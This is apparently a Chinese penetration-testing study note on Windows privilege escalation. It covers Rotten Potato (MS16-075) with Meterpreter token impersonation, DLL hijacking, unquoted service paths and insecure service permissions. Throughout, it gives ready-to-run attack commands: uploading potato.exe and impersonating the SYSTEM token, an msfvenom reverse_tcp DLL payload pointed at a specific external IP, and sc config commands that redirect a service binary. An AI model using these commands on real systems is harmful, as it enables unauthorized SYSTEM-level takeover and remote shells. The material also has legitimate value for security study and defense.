提权-win烂土豆dll劫持引号路径服务权限

以下几种提权方法的适合环境（web用户/本机用户）因方法而不同，有的方法在两种权限下都适用，一般也都是本机权限大于webshell权限。

win 烂土豆提权（MS16-075）：

烂土豆(Rotten Potato)提权是一个本地提权，是针对本地用户的，不能用于域用户，webshell环境或本地普通用户环境都可以适用。
过程：msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号：CVE-2016-3225
)。

我们是用之前的令牌窃取提权无法成功，因为webshell用户权限太低，无法窃取到system用户权限,我们此时可以配合烂土豆来提权。

补充下之前令牌窃取的知识：
Windows中有两种令牌，一种是Delegation Token，是为交互式登录（比如登录进系统或者通过远程桌面连接到系统）创建的。另一种是Impersonmate Token（模仿令牌），它是为非交互式会话创建的。

利用一个shell脚本查看用户权限上传生成的后门并执行：
配合令牌窃取来进行，就是一套流程，从websehll权限到system权限：

upload /root/potato.exe C:\Users\Public
cd C:\\Users\\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

参考：
windows提权方法总结
权限提升篇-令牌窃取与烂土豆提权
https://blog.csdn.net/qq_41874930/article/details/109766105

win dll劫持：

原理：Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在，则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。

通常，Windows 应用程序有其预定义好的搜索 DLL 的路径，它会根据下面的顺序进行搜索：
1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory，CWD
6、在 PATH 环境变量的目录（先系统后用户）

过程：信息收集(搜集服务器上其他的第三方应用)-进程调试(分析这个程序启动时调用那些dll)-制作dll并上传-替换dll-启动应用后成功。（因为系统dll运行时根本无法查看，更不可能替换了，本地调试）

比如火绒剑分析：

msf利用：

msfvenom -p windows/meterpreter/reverse_tcp
lhost=101.37.169.46 lport=6677 -f dll >/opt/xiaodi.dll

替换dll,MSF监听,当软件执行时调用dll,反弹成功。

弊端：
dll劫持提权需要有特定软件应用并能替换以及管理员要启用才行，三个条件缺一不可。
AlwaysInstallElevated提权默认禁用配置,利用成功机会很少。所以说此方法比较鸡肋。

Win-不带引号服务路径配合 MSF（Web,本地权限）：

原理：当 Windows 服务运行时，会发生以下两种情况之一。如果给出了可执行文件，并且引用了完
整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系
统将会执行找到的空格分隔的服务路径的第一个实例。

过程：检测引号服务路径-利用路径制作文件并上传-启用服务或重启-调用后成功

服务有没有引号，有引号的就正常，没有引号的话路径有没有空格，这样可能导致安全问题，比如空格后边被利用被当成参数执行，程序只执行参数之前的。

检测引号命令

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v ""

启用程序时我们用msf监听就能发现回显，并且启动服务的时候都是system权限启动。

弊端：
1.引号与空格，满足这个条件的就不太多。
2.是否第三方应用并且能启用/重启服务，且路径无引号，系统程序一般替换不了。

win-不安全的服务权限配合MSF（本地权限）：

原理：即使正确引用了服务路径，也可能存在其他漏洞。由于管理配置错误，用户可能对服务拥有
过多的权限，例如，可以直接修改它导致重定向执行文件。

过程：检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功

accesschk文件检测用户权限：

accesschk.exe -uwcqv "administrators" *
sc config "NewServiceName" binpath="C:\Program.exe"
sc start "NewServiceName"

AlwaysInstallElevated 提权：默认禁用配置，利用成功机会很小。

参考：
Windows提权命令参考

// 这些提权方法大多都是msf、上传文件来进行，学到的是方法/思路，但真实环境利用自然没那么简单，涉及到免杀、waf等等。

提权-win烂土豆dll劫持引号路径服务权限相关推荐

操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权
系列文章操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权操作系统权限提升(十四)之绕过UAC提权-基于白名 ...
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
目录权限分类针对环境 webshell权限本地用户权限提权方法 1.windows内核溢出漏洞(如何判断类型和利用) 2.数据库提权 Mysql Mssql oracle redis post ...
Linux提权（su和sudo）以及用户的权限（ugo）（超详细操作解释）
Linux提权(su和sudo)以及用户的权限(ugo)(超详细操作解释) 一. 提权(su和sudo) 1.su提权 su是用户切换命令,可以通过此命令进行任何用户的切换,root 用户切换为普通用 ...
C/C++ 提权与强制卸载DLL
权限提升 #include <Windows.h> #include <stdio.h>BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOO ...
权限提升：不带引号服务路径 || 不安全的服务权限.
权限提升:不带引号服务路径 || 不安全的服务权限. 权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务 ...
系统提权之：Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
Windows权限提升—令牌窃取、UAC提权、进程注入等提权
Windows权限提升-令牌窃取.UNC提权.进程注入等提权 1. 前言 2. at本地命令提权 2.1. 适用范围 2.2. 命令使用 2.3. 操作步骤 2.3.1. 模拟提权 2.3.2. at ...
dll注入工具_bypassUAC amp;amp; DLL劫持
0x11 UAC简介用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制.其原理是通知用户是否对应用程 ...
Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...

提权-win烂土豆dll劫持引号路径服务权限

提权-win烂土豆dll劫持引号路径服务权限相关推荐

最新文章

热门文章